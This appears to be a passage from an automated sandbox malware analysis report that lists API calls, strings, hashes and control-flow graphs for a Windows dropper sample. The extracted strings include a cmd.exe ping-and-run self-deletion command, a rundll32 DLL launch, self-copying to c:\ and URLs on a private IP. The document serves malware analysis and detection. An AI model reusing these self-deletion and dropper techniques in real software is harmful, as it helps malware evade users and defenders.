                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
                                                • Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55

                                                Control-flow Graph

                                                APIs
                                                • GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
                                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
                                                • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
                                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
                                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Menu$AppendMessageSend$System
                                                • String ID: http://www.1.com
                                                • API String ID: 62300227-1471656216
                                                • Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
                                                • Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: _mbscmp
                                                • String ID: user.ini
                                                • API String ID: 2888065108-1338118170
                                                • Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
                                                • Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB

                                                Control-flow Graph

                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 00402F09
                                                • lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
                                                • SysAllocString.OLEAUT32(00000000), ref: 00402F5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: AllocByteCharClearMultiStringVariantWidelstrlen
                                                • String ID: NULL
                                                • API String ID: 3257503732-324932091
                                                • Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
                                                • Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                • ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: rand$CountTicksrand
                                                • String ID: ekimhuqcroanflvzgdjtxypswb
                                                • API String ID: 3923125369-3762667353
                                                • Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
                                                • Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: fclosefopenfprintf
                                                • String ID: user.ini
                                                • API String ID: 167258513-1338118170
                                                • Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
                                                • Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: ClearFreeStringVariant
                                                • String ID:
                                                • API String ID: 1438600931-0
                                                • Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
                                                • Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
                                                • Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
                                                • Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

                                                Execution Graph

                                                Execution Coverage:9.4%
                                                Dynamic/Decrypted Code Coverage:3.3%
                                                Signature Coverage:0%
                                                Total number of Nodes:183
                                                Total number of Limit Nodes:5

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 004013FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoad
                                                • String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
                                                • API String ID: 2619053042-2457680838
                                                • Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
                                                • Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
                                                • Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
                                                • Opcode Fuzzy Hash: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
                                                • Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69

                                                Control-flow Graph

                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00415FE0
                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,?), ref: 00416153
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction ID: b5095fd7398c27d52b9b4c2b60e65f433afccfdda2a0a88fef6c4a84fe82fa18
                                                • Opcode Fuzzy Hash: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction Fuzzy Hash: 4D6119326002109FDB25CA14CC847E6BB75EF89314F29449AD5899B381D379EDC2CB55

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 004016BF
                                                • ExitProcess.KERNEL32 ref: 004016DE
                                                  • Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401286
                                                  • Part of subcall function 00401220: GetTickCount.KERNEL32 ref: 004012CD
                                                  • Part of subcall function 00401220: wsprintfA.USER32 ref: 004012EA
                                                  • Part of subcall function 00401220: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401321
                                                  • Part of subcall function 00401220: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401339
                                                  • Part of subcall function 004019C0: LoadIconA.USER32(00000000,00000080), ref: 00401B40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Sleep__p___argv$File$CountCreateExitIconLoadProcessTickWritewsprintf
                                                • String ID:
                                                • API String ID: 2567926744-0
                                                • Opcode ID: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
                                                • Instruction ID: 616903a36303fad059cf54e446dff4fbed7c69b0abb077ef7505e4f2811fcf63
                                                • Opcode Fuzzy Hash: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
                                                • Instruction Fuzzy Hash: 55315D740093C19AD334FB65C65DBDFBBE0AFE5308F04096EA58D162C2DB785548CA67

                                                Control-flow Graph

                                                control_flow_graph 126 40101b-401045 call 404148 __p___argv DeleteFileA
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: DeleteFile__p___argv
                                                • String ID:
                                                • API String ID: 2264924877-0
                                                • Opcode ID: bf514f4f8b3450d371abe8fd2ec50fab2b8f3e662778c779333cc8a1cf4ff616
                                                • Instruction ID: 361f11c7750a6d85eff9a8f0da96cb1417f6188351d19e92d2bb50a9746f2348
                                                • Opcode Fuzzy Hash: bf514f4f8b3450d371abe8fd2ec50fab2b8f3e662778c779333cc8a1cf4ff616
                                                • Instruction Fuzzy Hash: 6DD0C9792106119FC7247F58E91DA4A7BA4EF89302B4540AAFA01AB3A1CBB498408F94

                                                Control-flow Graph

                                                control_flow_graph 130 401090-401095 call 404148 __p___argv DeleteFileA
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: DeleteFile__p___argv
                                                • String ID:
                                                • API String ID: 2264924877-0
                                                • Opcode ID: 13b2291c2e5dbe36a149c3bb4d038d92b622d1ebf9b1753679f4a678d6a4a091
                                                • Instruction ID: 9c20f3d3dba36466ad4554863c02a9e62d6e2a013dcf2d6c67c330d6723d64da
                                                • Opcode Fuzzy Hash: 13b2291c2e5dbe36a149c3bb4d038d92b622d1ebf9b1753679f4a678d6a4a091
                                                • Instruction Fuzzy Hash: F4D05E382047108FC3146B54E918A5A76A0EB88301B0540BAFA02AB3E0CAB498409F9A
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004B0625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004B0658
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.1694804932.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_4b0000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: 62f81f45cd68e50e9bd05ac8982592f4b3b786d72f475be6bb4b65f4be7c2a13
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 4A213831A00219BFDB108F64CC40BEFFBF5FB55395F608163E910A2280E7788A119B64

                                                Control-flow Graph

                                                APIs
                                                • IsIconic.USER32(?), ref: 00401DEA
                                                • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
                                                • GetSystemMetrics.USER32(0000000B), ref: 00401E29
                                                • GetSystemMetrics.USER32(0000000C), ref: 00401E2F
                                                • GetClientRect.USER32(?,?), ref: 00401E3C
                                                • DrawIcon.USER32(?,?,?,?), ref: 00401E74
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                • String ID:
                                                • API String ID: 2166663075-0
                                                • Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
                                                • Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401140: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401140: ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 004011C2
                                                  • Part of subcall function 00401140: CloseHandle.KERNEL32(00000000), ref: 004011FD
                                                • Sleep.KERNEL32(00000064), ref: 00401286
                                                • GetTickCount.KERNEL32 ref: 004012CD
                                                • wsprintfA.USER32 ref: 004012EA
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                • Sleep.KERNEL32(00000064), ref: 00401321
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
                                                • Sleep.KERNEL32(00000064), ref: 00401339
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401349
                                                • CloseHandle.KERNEL32(00000000), ref: 00401350
                                                • __p___argv.MSVCRT ref: 0040137D
                                                • wsprintfA.USER32 ref: 0040139A
                                                • WinExec.KERNEL32(?,00000000), ref: 004013AD
                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000,?), ref: 004013B8
                                                • ExitProcess.KERNEL32 ref: 004013BC
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394
                                                • c:\%s.exe, xrefs: 004012DE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
                                                • String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                • API String ID: 529022016-1443030469
                                                • Opcode ID: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
                                                • Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
                                                • Opcode Fuzzy Hash: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
                                                • Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA

                                                Control-flow Graph

                                                control_flow_graph 252 401f00-401f40 CoInitialize call 403f80 255 401f51-401f88 call 403fa0 _mbscmp call 404178 252->255 256 401f42-401f4e 252->256 261 401ff9-402022 call 403fa0 _mbscmp call 404178 255->261 262 401f8a-401f9c call 403060 255->262 256->255 274 402024-40204d call 403fa0 _mbscmp call 404178 261->274 275 40204f-40205e call 403f40 261->275 267 401fcd-401ff7 call 403f80 262->267 268 401f9e-401fc8 call 403f80 262->268 281 402063-402078 CoUninitialize 267->281 268->281 274->275 274->281 275->281 284 40207a-402089 281->284 285 40208d-40209c 281->285 284->285 287 4020c9-4020da 285->287 288 40209e-4020ac 285->288 296 402115-40212a call 403260 287->296 297 4020dc-4020e6 287->297 292 4020b2-4020c6 288->292 293 40215b-402169 288->293 303 402132-40213d 296->303 304 40212c-40212e 296->304 299 4020e8-4020ea 297->299 300 4020ee-4020fc 297->300 299->300 300->293 302 4020fe-402112 300->302 305 402145-402153 303->305 306 40213f-402141 303->306 304->303 305->293 308 402155-402157 305->308 306->305 308->293
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: InitializeUninitialize_mbscmp
                                                • String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
                                                • API String ID: 2492722006-1795800369
                                                • Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
                                                • Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96

                                                Control-flow Graph

                                                APIs
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
